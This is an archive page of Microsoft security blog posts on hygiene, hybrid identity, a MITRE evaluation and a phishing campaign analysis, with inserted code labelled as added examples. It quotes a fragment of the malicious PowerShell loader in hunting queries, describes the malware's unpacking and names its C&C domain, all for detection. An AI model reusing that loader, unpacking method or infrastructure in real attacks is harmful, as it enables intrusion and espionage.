Archive for the ‘cybersecurity’ Category

CISO series: Strengthen your organizational immune system with cybersecurity hygiene

December 6th, 2018 No comments

One of the things I love about my job is the time I get to spend with security professionals, learning firsthand about the challenges of managing security strategy and implementation day to day. There are certain themes that come up over and over in these conversations. My colleague Ken Malcolmson and I discussed a few of them on the inaugural episode of the Microsoft CISO Spotlight Series: CISO Lessons Learned. Specifically, we talked about the challenges CISOs face migrating to the cloud and protecting their organizations' data. In this blog, I dig into one of the core concepts we talked about: practicing cybersecurity hygiene.

Hygiene means conditions or practices conducive to maintaining health. Cybersecurity hygiene is about maintaining cyberhealth by developing and implementing a set of tools, policies, and practices to increase your organization's resiliency in the face of attacks and exploits. Healthy habits like drinking lots of water, walking every day, and eating a rainbow of vegetables build up the immune system, so our bodies can fight off viruses with minimal downtime. Most of the time we don't even realize how powerful the protection of these behaviors is until that day deep in January when you look around your office and realize you are one of the only people who isn't sick. That's what cybersecurity hygiene does: it strengthens your organizational immune system. It's a simple concept until you start thinking about the last time you resolved to start practicing healthy habits but were skipping the salad by day three because big salads make your stomach bloat and you'd rather have a candy bar anyway.

Success starts with strategy

No matter where in the world I am, CSOs and CISOs tell me their days are filled with fire drills and crises that consume attention and resources but don't help advance a strategic agenda. A little like that candy bar: drawing focus in the present but diverting energy from long-term goals. In the precious moments of downtime, when cyber executives can turn attention to long-term strategy and proactive security measures, it's not uncommon to have those goals diverted in a different way: chasing the latest trend that the board is excited about, or having to react to a failure or a finding from a recent security assessment.

Consistent change changes systems

Our bodies are systems: when we eat more vegetables our microbiome changes, it becomes easier to digest those veggies, and we can actually begin craving them. But if you stock the pantry with candy instead of leafy greens, it's hard to make a consistent change. For cyberhealth, you need a strategy that works with the strengths of your organization and mitigates its weaknesses. It's a little like planning to be healthy. If you are social, it can help to enlist a friend in your exercise routine. If you work late, you can buy prepared, healthy food, so you aren't as tempted to grab that candy bar after a long day.

To implement good security practices, take some time to understand your budget, your priorities, and your greatest vulnerabilities, and allocate your money accordingly. Create strategic cybersecurity targets and goals for the next one, three, and five years, and engage the C-Suite and board in the approvals. You will feel more empowered in conversations with the C-Suite when you have a good rationale and a solid plan, and when cybersecurity hygiene becomes a systemic part of the organization, the healthy system will start to crave it.

Practice good cybersecurity hygiene

Once you have a strategy, you are ready to institute some best practices. We recommend that all our clients, big and small, start with the following:

  • Back up data: Maintain a regular process to back up your data to a location separate from your production data, and encrypt the backups in transit and at rest.
  • Implement a common identity: A good identity and access management solution lets you use a single identity across on-premises and cloud resources, with added safeguards to protect your most privileged accounts.
  • Deploy conditional access: Use conditional access to control access based on location, device, or other risk factors.
  • Use Multi-Factor Authentication: Multi-Factor Authentication works on its own or in conjunction with conditional access to verify that users trying to access your resources are who they say they are.
  • Patch regularly: A strategy to ensure all of your software and hardware is regularly patched and updated reduces the number of vulnerabilities an attacker can exploit.

Develop cybersecurity hygiene with industry security frameworks

Excited to build healthy cyber habits but not sure where to start? The National Institute of Standards and Technology (NIST) Cybersecurity Framework is a great place to start. You can also download blueprints that will help you implement Microsoft Azure according to NIST standards.

The Center for Internet Security (CIS) is a non-profit organization that helps organizations protect themselves from cybercrime. Review the CIS Microsoft Azure Foundations Benchmark, which provides recommended steps to securely implement Azure.

Stay healthy, eat your cyber vegetables, and stay up to date by watching our Microsoft CISO Spotlight Series: CISO Lessons Learned, and your organization can build the resiliency to take on any threat.

The post CISO series: Strengthen your organizational immune system with cybersecurity hygiene appeared first on Microsoft Secure.

Categories: cybersecurity

Step 1. Identify users: top 10 actions to secure your environment

December 5th, 2018 No comments

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. We'll provide advice on activities such as setting up identity management through Active Directory, malware protection, and more. In this post, we explain how to create a single common identity across on-premises and cloud with hybrid authentication.

Establishing a single, common identity for each user is the foundational step of your cybersecurity strategy. If you currently have an on-premises footprint, this means connecting your Azure Active Directory (Azure AD) to your on-premises resources. There are various requirements and circumstances that will influence the hybrid identity and authentication method that you choose, but whether you choose federation or cloud authentication, there are important security implications for each that you should consider. This blog walks you through our recommended security best practices for each hybrid identity method.

Set up password hash synchronization as your primary authentication method when possible

Azure AD Connect gives your users one identity for both on-premises resources and cloud resources such as Azure, Office 365, and Azure AD-integrated SaaS apps. It uses your on-premises Active Directory as the authority, so you can keep your own password policy, and it gives you visibility into the types of apps and identities that are accessing your company resources. If you choose Azure AD Connect, Microsoft recommends that you enable password hash synchronization (Figure 1) as your primary authentication method. Password hash synchronization synchronizes a hash of the password hash stored in your on-premises Active Directory to Azure AD (the on-premises hash itself is re-hashed with a per-user salt before it is sent, so it never leaves the domain). Authentication then happens in the cloud with no on-premises dependency, which simplifies your deployment. It also allows you to take advantage of Azure AD Identity Protection, which will alert you if any of the usernames and passwords in your organization show up in leaked credential dumps.

Figure 1. Password hash sync synchronizes the password hash in your on-premises Active Directory to Azure AD.

Enable password hash synchronization as a backup during on-premises outages

If your authentication requirements are not natively supported by password hash synchronization, another option available through Azure AD Connect is pass-through authentication (Figure 2). Pass-through authentication provides simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. Since pass-through authentication relies on your on-premises infrastructure, your users could lose access to both Azure AD-connected cloud resources and on-premises resources if your on-premises environment goes down. To limit user downtime and loss of productivity, we recommend that you configure password hash synchronization as a backup. This allows your users to sign in and access cloud resources during an on-premises outage. It also gives you access to advanced security features, like Azure AD Identity Protection.

Figure 2. Pass-through authentication provides a simple password validation for Azure AD authentication services.

Whether you implement password hash synchronization as your primary authentication method or as a backup during on-premises outages, you can use the Active Directory Federation Services (AD FS) to password hash sync deployment plan as a step-by-step guide to walk you through the implementation process.

Implement extranet lockout if you use AD FS

AD FS may be the right choice if your organization requires on-premises authentication or if you are already invested in federation services (Figure 3). Federation services authenticate users and connect to the cloud using an on-premises footprint that may require several servers. To ensure your users and data are as secure as possible, we recommend two additional steps.

First, enable password hash synchronization as a backup authentication method to get access to Azure AD Identity Protection and minimize interruptions if an outage should occur. Second, we recommend you implement extranet lockout. Extranet lockout protects against brute-force attacks that target AD FS from the internet, while preventing those same attempts from locking users out of Active Directory; for that to hold, the AD FS lockout threshold must be lower than the Active Directory account lockout threshold. If you are using AD FS on Windows Server 2016, set up extranet smart lockout. For AD FS on Windows Server 2012 R2, turn on extranet lockout protection.

Figure 3. Federation services authenticates users and connects to the cloud using an on-premises footprint.

You can use the AD FS to pass-through authentication deployment plan as a step-by-step guide to walk you through the implementation process.
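As an added example (not part of the original post), here is how the two AD FS steps above are applied from an elevated PowerShell session on the primary AD FS server. The threshold and observation-window values, the fallback threshold of 10, and the account name in the commented-out verification calls are assumptions to replace with your own; the cmdlets and parameters are the ones the ADFS and ActiveDirectory modules ship.

```powershell
# Added example, not from the original post. Run elevated on the primary
# AD FS server; needs the ADFS and ActiveDirectory PowerShell modules.

# Choose an AD FS threshold strictly below the domain's account lockout
# threshold, so a brute-force attempt from the extranet is stopped at AD FS
# and never locks the user out of Active Directory itself. A domain
# threshold of 0 means AD never locks accounts, in which case 10 is an
# assumed default, not a recommendation from the post.
$domainPolicy  = Get-ADDefaultDomainPasswordPolicy
$adfsThreshold = if ($domainPolicy.LockoutThreshold -gt 1) { $domainPolicy.LockoutThreshold - 1 } else { 10 }
$window        = New-TimeSpan -Minutes 30      # assumed observation window

$osVersion = [version](Get-CimInstance Win32_OperatingSystem).Version

if ($osVersion.Major -ge 10) {
    # Windows Server 2016 (AD FS 4.0): extranet smart lockout. Start in
    # log-only mode so familiar/unfamiliar locations are learned without
    # blocking anyone, then switch to enforce once the audit log looks right.
    # Smart lockout arrived in a 2018 update; apply its documented
    # prerequisites to every farm node first.
    Set-AdfsProperties -EnableExtranetLockout $true `
                       -ExtranetLockoutThreshold $adfsThreshold `
                       -ExtranetObservationWindow $window `
                       -ExtranetLockoutMode ADFSSmartLockoutLogOnly
    Restart-Service adfssrv        # mode changes need a restart on every node
}
else {
    # Windows Server 2012 R2 (AD FS 3.0): classic extranet lockout protection.
    Set-AdfsProperties -EnableExtranetLockout $true `
                       -ExtranetLockoutThreshold $adfsThreshold `
                       -ExtranetObservationWindow $window
}

# Verify the effective settings (ExtranetLockoutMode is empty on 2012 R2).
Get-AdfsProperties |
    Select-Object EnableExtranetLockout, ExtranetLockoutThreshold,
                  ExtranetObservationWindow, ExtranetLockoutMode

# Later, on 2016 only: move to enforcement, and review or clear one user's
# counters. 'CONTOSO\alice' is a placeholder account name.
# Set-AdfsProperties -ExtranetLockoutMode ADFSSmartLockoutEnforce; Restart-Service adfssrv
# Get-AdfsAccountActivity -Identity 'CONTOSO\alice'
# Reset-AdfsAccountLockout -Identity 'CONTOSO\alice' -Location Unknown
```

The AD FS threshold is derived from the domain policy rather than typed in, because the whole point of extranet lockout is lost if someone later raises it above the Active Directory value; re-run the check whenever the domain password policy changes.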

Learn more

Check back in a few weeks for our next blog post, Step 2. Manage authentication and safeguard access. In this post we'll dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.


The post Step 1. Identify users: top 10 actions to secure your environment appeared first on Microsoft Secure.

Categories: cybersecurity

Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP

In MITRE's evaluation of endpoint detection and response solutions, Windows Defender Advanced Threat Protection demonstrated industry-leading optics and detection capabilities. The breadth of telemetry, the strength of threat intelligence, and the advanced, automatic detection through machine learning, heuristics, and behavior monitoring delivered comprehensive coverage of attacker techniques across the entire attack chain.

MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also known as Boron or UPS). To isolate detection capabilities, all protection and prevention features were turned off as part of the testing. In the case of Windows Defender ATP, this meant turning off blocking capabilities like hardware-based isolation, attack surface reduction, network protection, exploit protection, controlled folder access, and next-gen antivirus. The test showed that, by itself, Windows Defender ATP's EDR component is one of the most powerful detection and investigation solutions in the market today.

Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics. MITRE closely partnered with participating security vendors in designing and executing the evaluation, resulting in a very collaborative and productive testing process.
We like participating in scientific and impartial tests because we learn from them. Learning from independent tests, like listening to customers and conducting our own research, is part of our goal to make sure that Windows Defender ATP is always ahead of threats and continues to evolve.

Overall, the results of the MITRE evaluation validated our investments in continuously enriching Windows Defender ATP's capabilities to detect and expose attacker techniques. Below we highlight some of the key attacker techniques that Windows Defender ATP effectively detected during the MITRE testing.

Deep security telemetry and comprehensive coverage

Windows Defender ATP showed exceptional capabilities for detecting attacker techniques through APT3s attack stages, registering the lowest number of misses among evaluated products. Throughout the emulated attack chain, Windows Defender ATP detected the most critical attacker techniques, including:

  • Multiple discovery techniques (detected with the "Suspicious sequence of exploration activities" alert)
  • Multiple process injection attempts for privilege escalation, credential theft, and keylogging/screen capture
  • Rundll32.exe being used to execute malware
  • Credential dumping from LSASS
  • Persistence via Scheduled Task
  • Keylogging (both in Cobalt Strike and PS Empire)
  • Brute force login attempts
  • Accessibility features attack (abusing sticky keys)
  • Lateral movement via remote service registration
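The accessibility features attack in this list is, on the host, usually one of two changes: an Image File Execution Options (IFEO) Debugger value that makes Windows launch another program in place of sethc.exe or a sibling tool, or the tool's binary in System32 replaced outright (classically with a copy of cmd.exe). The following check is an added example, not Windows Defender ATP logic and not from the original post; it assumes a Windows host, PowerShell 5 and the list of accessibility binaries given inline.

```powershell
# Added example, not from the original post. Run elevated on the host under
# review. Reports both "sticky keys" persistence variants for each
# accessibility binary that Windows will launch from the logon screen.
$accessibilityBinaries = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                         'magnify.exe', 'displayswitch.exe', 'atbroker.exe'
$ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Test-AccessibilityHijack {
    param([string[]]$Binaries = $accessibilityBinaries)

    foreach ($name in $Binaries) {
        $finding = [ordered]@{
            Binary           = $name
            IfeoDebugger     = $null
            SignatureStatus  = $null
            OriginalFilename = $null
            Suspicious       = $false
        }

        # Variant 1: an IFEO Debugger value. Windows starts that program with
        # the original command line instead of the accessibility tool.
        # (32-bit images also have a Wow6432Node view; extend if needed.)
        $key = Join-Path $ifeoRoot $name
        if (Test-Path $key) {
            $dbg = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).Debugger
            if ($dbg) {
                $finding.IfeoDebugger = $dbg
                $finding.Suspicious   = $true
            }
        }

        # Variant 2: the file in System32 swapped for another binary. A copied
        # cmd.exe still carries a valid Microsoft catalog signature, so the
        # signature alone is not enough; the version resource's
        # OriginalFilename gives the file away (it reads "Cmd.Exe").
        $path = Join-Path $env:SystemRoot "System32\$name"
        if (Test-Path $path) {
            $sig  = Get-AuthenticodeSignature -FilePath $path
            $orig = (Get-Item $path).VersionInfo.OriginalFilename
            $finding.SignatureStatus  = $sig.Status
            $finding.OriginalFilename = $orig
            # -ne on strings is case-insensitive in PowerShell.
            if ($sig.Status -ne 'Valid' -or ($orig -and $orig -ne $name -and $orig -ne "$name.mui")) {
                $finding.Suspicious = $true
            }
        }

        [pscustomobject]$finding
    }
}

Test-AccessibilityHijack | Format-Table -AutoSize
```

Anything with Suspicious set to True deserves a look at the IFEO key's timestamps and the file's hash against a known-good copy; an EDR sensor sees the same two registry and file events at the moment they are made, which is what the alert above is keyed on.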

Windows Defender ATP correlates security signals across endpoints and identities. In the case of the APT3 emulation, signals from Azure Advanced Threat Protection helped expose and enrich the detection of the account discovery behavior. This validates the strategic approach behind Microsoft Threat Protection: the most comprehensive protection comes from sharing rich telemetry collected from across the entire attack chain.

Windows Defender ATP's Antimalware Scan Interface (AMSI) sensors also proved especially powerful, providing rich telemetry on the latter stages of the attack emulation, which made heavy use of malicious PowerShell scripts. This test highlighted the value of transparency: the AMSI interface enabled deep visibility into the PowerShell used in each attacker technique. Advanced machine learning-based detection capabilities in Windows Defender ATP use this visibility to expose malicious scripts.

Stopping attacks in the real world with Windows Defender ATPs unified endpoint security platform

The MITRE results represent EDR detection capabilities, which surface malicious and other anomalous activities. In actual customer environments, Windows Defender ATPs preventive capabilities, like attack surface reduction and next-gen protection capabilities, would have blocked many of the attack techniques at the onset. In addition, investigation and hunting capabilities enable security operations personnel to correlate alerts and incidents to enable holistic response actions and build wider protections.

Windows Defender ATP's best-in-class detection capabilities, as affirmed by MITRE, are amplified across Microsoft solutions through Microsoft Threat Protection, a comprehensive, integrated protection for identities, endpoints, user data, cloud apps, and infrastructure. To run your own evaluation of how Windows Defender ATP can help protect your organization and let you detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.




Windows Defender ATP team




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.



The post Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP appeared first on Microsoft Secure.

Categories: APT3, ATT&CK, BORON, cybersecurity, MITRE

Kicking off the Microsoft Graph Security Hackathon

December 3rd, 2018 No comments

Cybersecurity is one of the hottest sectors in tech, with Gartner predicting worldwide information security spending to reach $124 billion by the end of 2019. New startups and security solutions are coming onto the market while attackers continue to find new ways to breach systems. The security solutions market has grown at a rapid pace as a result. Our customers face immense challenges in integrating all these different solutions, tools, and intelligence. Oftentimes, the number of disconnected solutions makes it more difficult, rather than easier, to defend against and recover from attacks.

We invite you to participate in the Microsoft Graph Security Hackathon for a chance to help solve this pressing challenge and win a piece of the $15,000 cash prize pool.* This online hackathon runs from December 1, 2018 to March 1, 2019 and is open to individuals, teams, and organizations globally.

The Microsoft Graph Security API offers a unified REST endpoint that makes it easy for developers to bring security solutions together to streamline security operations and improve cyber defenses and response. Tap into other Microsoft Graph APIs as well as mash up data and APIs from other sources to extend or enrich your scenarios.


In addition to learning more about the Microsoft Graph and the security API, the hackathon offers these awesome prizes for the top projects:

  • $10,000 cash prize for the first-place solution, plus a speaking opportunity at Build 2019.
  • $3,000 cash prize for the runner up solution.
  • $2,000 cash prize for the popular choice solution, chosen via public voting.

In addition, all three winning projects, and the individuals or teams in the categories above, will be widely promoted on Microsoft blog channels, giving you the opportunity for your creative solutions to be known to the masses. The judging criteria will be the quality of the idea, value to the enterprise, and technical implementation. You can find all the details you need on the Microsoft Graph Security Hackathon website.

Judging panel

Once the hackathon ends on March 1, 2019, judging begins immediately. We'll announce the winners on or before April 1, 2019. The hackathon will be judged by a panel of Microsoft and non-Microsoft experts and influencers in the developer community and in cybersecurity, including:

  • Ann Johnson, Corporate Vice President for Cybersecurity Solutions Group for Microsoft
  • Scott Hanselman, Partner Program Manager for Microsoft
  • Mark Russinovich, CTO Azure for Microsoft
  • Rick Howard, Chief Security Officer Palo Alto Networks

We will announce more judges in the coming weeks!

Next steps

Let the #graphsecurityhackathon begin

*No purchase necessary. Open only to new and existing Devpost users who are the age of majority in their country. Game ends March 1, 2019 at 5:00 PM Eastern Time. For details, see the official rules.

The post Kicking off the Microsoft Graph Security Hackathon appeared first on Microsoft Secure.

Categories: cybersecurity

Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers

December 3rd, 2018 No comments

Reuters recently reported a hacking campaign focused on a wide range of targets across the globe. In the days leading to the Reuters publication, Microsoft researchers were closely tracking the same campaign.

Our sensors revealed that the campaign primarily targeted public sector institutions and non-governmental organizations like think tanks and research centers, but also included educational institutions and private-sector corporations in the oil and gas, chemical, and hospitality industries.

Microsoft customers using the complete Microsoft Threat Protection solution were protected from the attack. Behavior-based protections in multiple Microsoft Threat Protection components blocked malicious activities and exposed the attack at its early stages. Office 365 Advanced Threat Protection caught the malicious URLs used in emails, driving the blocking of said emails, including first-seen samples. Meanwhile, numerous alerts in Windows Defender Advanced Threat Protection exposed the attacker techniques across the attack chain.

Third-party security researchers have attributed the attack to a threat actor named APT29 or Cozy Bear, which largely overlaps with the activity group that Microsoft calls YTTRIUM. While our fellow analysts make a compelling case, Microsoft does not yet believe that enough evidence exists to attribute this campaign to YTTRIUM.

Regardless, due to the nature of the victims, and because the campaign features characteristics of previously observed nation-state attacks, Microsoft took the step of notifying thousands of individual recipients in hundreds of targeted organizations. As part of the Defending Democracy Program, Microsoft encourages eligible organizations to participate in Microsoft AccountGuard, a service designed to help these highly targeted customers protect themselves from cybersecurity threats.

Attack overview

The aggressive campaign began early in the morning of Wednesday, November 14. The targeting appeared to focus on organizations that are involved with policy formulation and politics or have some influence in that area.

Phishing targets in different industry verticals

Although targets are distributed across the globe, the majority are located in the United States, particularly in and around Washington, D.C. Other targets are in Europe, Hong Kong, India, and Canada.

Phishing targets in different locations

The spear-phishing emails mimicked sharing notifications from OneDrive and, as noted by Reuters, impersonated the identity of individuals working at the United States Department of State. If recipients clicked a link on the spear-phishing emails, they began an exploitation chain that resulted in the implantation of a DLL backdoor that gave the attackers remote access to the recipients machines.

Attack chain

Analysis of the campaign


The spear-phishing emails used in this attack resemble file-sharing notifications from OneDrive.

The emails contain a link to a legitimate, but compromised third-party website:

hxxps://[random string]

The random strings are likely used to identify distinct targeted individuals who clicked on the link. However, all observed variants of this link redirect to a specific link on the same site:


When users click the link, they are served a ZIP archive containing a malicious LNK file. All files in a given attack share the same base name, for example, ds7002.pdf and ds7002.lnk.


The LNK file represents the first stage of the attack. It executes an obfuscated PowerShell command that extracts a base64-encoded payload from within the LNK file itself, starting at offset 0x5e2be and extending 16,632 bytes.

Encoded content in the LNK file

The encoded payload, another heavily obfuscated PowerShell script, is decoded and executed:

Decoded second script

The second script carves out two additional resources from within the .LNK file:

  • ds7002.PDF (A decoy PDF)
  • cyzfc.dat (The first stage implant)

Command and control

The first-stage DLL, cyzfc.dat, is created by the PowerShell script in the path %AppData%\Local\cyzfc.dat. It is a 64-bit DLL that exports one function: PointFunctionCall.

The PowerShell script then executes cyzfc.dat by calling rundll32.exe. After connecting to the first-stage command-and-control server at pandorasong[.]com, cyzfc.dat begins to install the final payload by taking the following actions:

  1. Allocate a read-write page for the second-stage payload.
  2. Extract the second-stage payload as a resource.
  3. Take the 0xEF-byte header that is baked into the first payload.
  4. Concatenate the header with the resource, starting at byte 0x12A.
  5. De-XOR the second-stage payload with a rolling XOR (ROR1), starting from key 0xC5.

The second stage is an instance of Cobalt Strike, a commercially available penetration testing tool, which performs the following steps:

  1. Define a local named pipe with the format \\.\pipe\MSSE-<number>-server, where <number> is a random number between 0 and 9897.
  2. Connect to the pipe and write global data of size 0x3FE00 to it.
  3. Implement a backdoor over the named pipe:

    1. Read from the pipe (at most 0x3FE00 bytes) into an allocated buffer.
    2. De-XOR the payload into a new read-write memory region, this time with a much simpler scheme: every 4 bytes are XORed with the dword 0x7CC2885F.
    3. Change the region's protection to read-execute (RX).
    4. Create a thread that starts running the payload.

The step that writes global data to the pipe actually writes a third payload, XORed with the same dword key used on the read side. Once decoded, it forms a PE file with a Meterpreter header, which interprets instructions in the PE header and moves control to a reflective loader.

The third payload eventually gets loaded and connects to the command-and-control (C&C) server address that is baked into configuration information inside the PE file. This configuration information is de-XORed at runtime by the third payload.

The configuration information itself mostly contains C&C information.

Cobalt Strike is a feature-rich penetration testing tool that provides remote attackers with a wide range of capabilities, including escalating privileges, capturing user input, executing arbitrary commands through PowerShell or WMI, performing reconnaissance, communicating with C&C servers over various protocols, and downloading and installing additional malware.
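The three unpacking steps described above (carving the base64 text out of the LNK, the rolling XOR on the second stage, and the dword XOR on the named-pipe payload) are reproduced here as an added example in PowerShell; this is not the attackers' code and not from the original post. The offset, length and keys are the ones the analysis gives. The reading of "rolling XOR (ROR1)" as XOR-then-rotate-right-by-one with a data-independent keystream, the function names, and the constructed self-check buffer are assumptions; the 0xEF-byte header concatenation at byte 0x12A is not reproduced.

```powershell
# Added example, not the attackers' code and not from the original post.
# Reproduces the unpacking steps from the analysis on local copies of the samples.

# Stage 1: carve the base64 text that the LNK's own PowerShell command reads
# from inside the LNK file (offset and length as given in the analysis).
function Get-LnkEmbeddedPayload {
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$Offset = 0x5e2be,
        [int]$Length = 16632
    )
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    if ($bytes.Length -lt ($Offset + $Length)) {
        throw "File is only $($bytes.Length) bytes; expected an embedded payload at offset 0x$('{0:x}' -f $Offset)"
    }
    $b64 = [System.Text.Encoding]::ASCII.GetString($bytes, $Offset, $Length)
    return ,[System.Convert]::FromBase64String($b64)   # leading comma keeps it a byte[]
}

# Stage 2: rolling XOR with an 8-bit key that starts at 0xC5 and is rotated
# right by one bit (ROR1) after every byte. ASSUMPTION: "rolling XOR (ROR1)"
# is read as XOR-then-rotate with a keystream that does not depend on the
# data; confirm against the sample before relying on the output.
function Unprotect-RollingXor {
    param([Parameter(Mandatory)][byte[]]$Data, [byte]$Key = 0xC5)
    $out = New-Object byte[] $Data.Length
    $k = [int]$Key
    for ($i = 0; $i -lt $Data.Length; $i++) {
        $out[$i] = [byte]($Data[$i] -bxor $k)
        $k = (($k -shr 1) -bor (($k -band 1) -shl 7)) -band 0xFF   # 8-bit ROR1
    }
    return ,$out
}

# Stage 3 (the named-pipe payload): every 4 bytes XORed with the little-endian
# dword 0x7CC2885F. XOR is its own inverse, so this both packs and unpacks.
function Unprotect-DwordXor {
    param([Parameter(Mandatory)][byte[]]$Data, [uint32]$Key = 0x7CC2885F)
    $keyBytes = [System.BitConverter]::GetBytes($Key)
    $out = New-Object byte[] $Data.Length
    for ($i = 0; $i -lt $Data.Length; $i++) {
        $out[$i] = [byte]($Data[$i] -bxor $keyBytes[$i % 4])
    }
    return ,$out
}

# Self-check on a constructed buffer (not sample bytes): both keystreams are
# independent of the data, so applying each transform twice returns the input.
$plain = [System.Text.Encoding]::ASCII.GetBytes('MZ' + ('A' * 14))
foreach ($fn in 'Unprotect-RollingXor', 'Unprotect-DwordXor') {
    $twice = & $fn -Data (& $fn -Data $plain)
    if (($twice -join ',') -ne ($plain -join ',')) { throw "$fn round-trip failed" }
}

# Against the real samples (paths are placeholders):
#   $stage2Script = [System.Text.Encoding]::ASCII.GetString((Get-LnkEmbeddedPayload -Path .\ds7002.lnk))
#   $stage2Blob   = Unprotect-RollingXor -Data ([System.IO.File]::ReadAllBytes('.\stage2.bin'))
#   $stage3Pe     = Unprotect-DwordXor   -Data ([System.IO.File]::ReadAllBytes('.\pipe_capture.bin'))
```

A decoded stage that starts with the bytes 4D 5A ("MZ") is a good sign the keystream reading is right; if the rolling XOR output does not, the sample may rotate before XORing or feed the ciphertext back into the key, and the loop body is the one place to adjust.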

End-to-end defense through Microsoft Threat Protection

Microsoft Threat Protection is a comprehensive solution for enterprise networks, protecting identities, endpoints, user data, cloud apps, and infrastructure. By integrating Microsoft services, Microsoft Threat Protection facilitates signal sharing and threat remediation across services. In this attack, Office 365 Advanced Threat Protection and Windows Defender Advanced Threat Protection quickly mitigated the threat at the onset through durable behavioral protections.

Office 365 ATP has enhanced phishing protection and coverage against new threats and polymorphic variants. Detonation systems in Office 365 ATP caught behavioral markers in the links in the emails, allowing us to block campaign emails, including first-seen samples, and protect targeted customers. Three existing behavior-based detection algorithms quickly determined that the URLs were malicious. In addition, Office 365 ATP uses security signals from Windows Defender ATP, which had a durable behavior-based antivirus detection (Behavior:Win32/Atosev.gen!A) for the second-stage malware. If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

Safe Links protection in Office 365 ATP protects customers from attacks like this by analyzing unknown URLs when customers try to open them. Zero-hour Auto Purge (ZAP) actively removes emails post-delivery after they have been verified as malicious; this is often critical in stopping attacks that weaponize embedded URLs after the emails are sent.

All of these protections and signals on the attack entry point are shared with the rest of the Microsoft Threat Protection components. Windows Defender ATP customers would see alerts related to the detection of the malicious emails by Office 365 ATP, as well the behavior-based antivirus detection.

Windows Defender ATP detects known filesystem and network artifacts associated with the attack. In addition, the actions of the LNK file are detected behaviorally. Alerts with the following titles are indicative of this attack activity:

  • Artifacts associated with an advanced threat detected
  • Network activity associated with an advanced threat detected
  • Low-reputation arbitrary code executed by signed executable
  • Suspicious LNK file opened

Network protection blocks connections to malicious domains and IP addresses. The following attack surface reduction rule also blocks malicious activities related to this attack:

  • Block executable files from running unless they meet a prevalence, age, or trusted list criteria

Through Windows Defender Security Center, security operations teams could investigate these alerts and pivot to machines, users, and the new Incidents view to trace the attack end-to-end. Automated investigation and response capabilities, threat analytics, as well as advanced hunting and new custom detections, empower security operations teams to defend their networks from this attack. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

The following Advanced hunting query can help security operations teams search for any related activities within the network:

//Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

//Query 2: C&C connection
NetworkCommunicationEvents
| where EventTime > ago(10d) 
| where RemoteUrl == "" 

//Query 3: Malicious PowerShell
ProcessCreationEvents
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 
"-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0" 

//Query 4: Malicious domain in default browser commandline
ProcessCreationEvents
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 

//Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

The provided queries check events from the past ten days. Change the ago(10d) window in the EventTime filter to focus on a different period.




Windows Defender Research team, Microsoft Threat Intelligence Center, and Office 365 ATP research team




Indicators of attack

Files (SHA-1)

  • ds7002.ZIP: cd92f19d3ad4ec50f6d19652af010fe07dca55e1
  • ds7002.LNK: e431261c63f94a174a1308defccc674dabbe3609
  • ds7002.PDF (decoy PDF): 8e928c550e5d44fb31ef8b6f3df2e914acd66873
  • cyzfc.dat (first-stage): 9858d5cb2a6614be3c48e33911bf9f7978b441bf


  • hxxps://www.jmj[.]com/personal/nauerthn_state_gov/VFVKRTdRSm

C&C servers

  • pandorasong[.]com (first-stage C&C server)







The post Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers appeared first on Microsoft Secure.

Secure your privileged administrative accounts with a phased roadmap

November 29th, 2018 No comments

In my role, I often meet with CISOs and security architects who are updating their security strategy to meet the challenges of continuously evolving attacker techniques and cloud platforms. A frequent topic is prioritizing security for their highest value assets, both the assets that have the most business value today and the initiatives that the organization is banking on for the future. This typically includes intellectual property, customer data, key new digital initiatives, and other data that, if leaked, would do the greatest reputational and financial damage. Once we've identified the highest value assets, it inevitably leads to a conversation about all the privileged accounts that have administrative rights over these assets. Most of our customers recognize that you can no longer protect the enterprise just by securing the network edge; the cloud and mobile devices have permanently changed that. Identities represent the critically important new security perimeter in a dual perimeter strategy while legacy architectures are slowly phased out.

Regardless of perimeter and architecture, there are few things more important to a secure posture than protecting admins. This is because a compromised admin account would cause a much greater impact on the organization than a compromised non-privileged user account.

If you are working on initiatives to secure your privileged accounts (and I hope you are), this post is designed to help. I've shared some of the principles and tools that Microsoft has used to guide and enhance our own security posture, including some prescriptive roadmaps to help you plan your own initiatives.

Protect the privileged access lifecycle

